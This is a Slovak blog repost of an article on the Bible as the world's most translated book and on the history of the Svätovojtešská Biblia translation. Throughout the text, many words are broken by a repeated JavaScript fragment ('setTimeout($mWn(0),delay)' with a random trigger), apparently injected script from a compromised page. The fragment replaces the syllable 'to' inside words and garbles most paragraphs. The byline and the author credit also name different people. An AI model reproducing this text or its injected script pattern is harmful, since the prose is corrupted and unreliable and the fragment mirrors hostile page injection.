Slovo

Biblia je najprekladanejšia kniha na svete

3. februára 2017 | Martin Mati

Prečítané: 2158x

„Keď čítame Sväté písmo, Boh sa vracia poprechádzať do pozemského raja,“ hovorí veľký učiteľ Cirkvi sv. Ambróz a nádherným poetickým jazykom tak vyjadruje, že Biblia má osobitné miesdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to medzi všetkými knihami sveta, ale aj v osobnom živote každého z nás.

Každý národ, kdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torý spoznal Krista, sa usiloval preložiť Bibliu do svojho jazyka, aby bola prístupná všetkým ľuďom. Biblia je najprekladanejší a najrozšírenejší text v dejinách, preložená je do viac ako 2 400 jazykov. Je dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to tak zrejme predom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to, lebo kresťania sú presvedčení, že posolstvo Biblie má byť prídom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomné v každom jazyku a Božie slovo treba ohlasovať do všetkých kúdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tov sveta.

Prvým slovenským prekladom Biblie do slovenčiny v 20. sdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toročí bola takzvaná Svädom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tovojtešská Biblia, kdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torú v rokoch 1913 – 1926 postupne publikoval Spolok svätého Vojtecha (SSV). Zakladateľovi SSV Andrejovi Radlinskému mimoriadne záležalo na dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom, aby vznikol preklad Biblie do slovenčiny a už v roku 1870 vyzval na spoluprácu na preklade slovenských literádom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tov.  Po Radlinského smrti sa projektu ujal teológ, filozof a hisdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torik František Víťazoslav Sasinek (1830 – 1914), ale ani on nedotiahol preklad Biblie do úspešného konca. Vzhľadom na dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to, že žil v Prahe, bol jeho preklad nadom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toľko ovplyvnený češtinou, že sa napokon upustilo od jeho redigovania, a SSV sa rozhodol pre nový preklad. V roku 1904 poveril výbor SSV básnika Jána Donovala (1864 – 1920), známeho pod pseudonymom Tichomír Milkin, koordináciou a redakciou nového prekladu Biblie. Prekladom Starého zákona bol v roku 1908 poverený Andrej Hlinka.

Preklady jednotlivých kníh svädom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tovojtešskej Biblie vychádzali postupne od roku 1913 do roku 1923 ako podielové knihy. Keďže prácu na dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to zložidom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom projekte skomplikovala prvá svedom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tová vojna, kompletný preklad Biblie vyšiel až v roku 1926, na sté výročie Palkovičovho prekladu.

Na tradíciu Svädom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tovojtešskej Biblie ako rodinného klenotu nadväzuje aj najnovšie vydanie Biblie z vydavateľskej dielne Spolku svätého Vojtecha. Vďaka väčšiemu formátu je v nej použitý väčší typ písma, v prílohe navyše obsahuje rodinnú kroniku, do kdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torej si možno zapisovať dôležité udalosti. Biblia vyšla v modrej a baklažánovej farbe, ku kdom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torej si možno dokúpiť kvalitný kožený obal. Krátko pred Vianocami bude dostupná aj exkluzívna verzia v koži so zladom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tou oriezkou. 

Autor článku:
Martina Grochálová

Zdroj článku:
https://www.postoj.sk/19877/biblia-je-najprekladanejsia-kniha-na-svete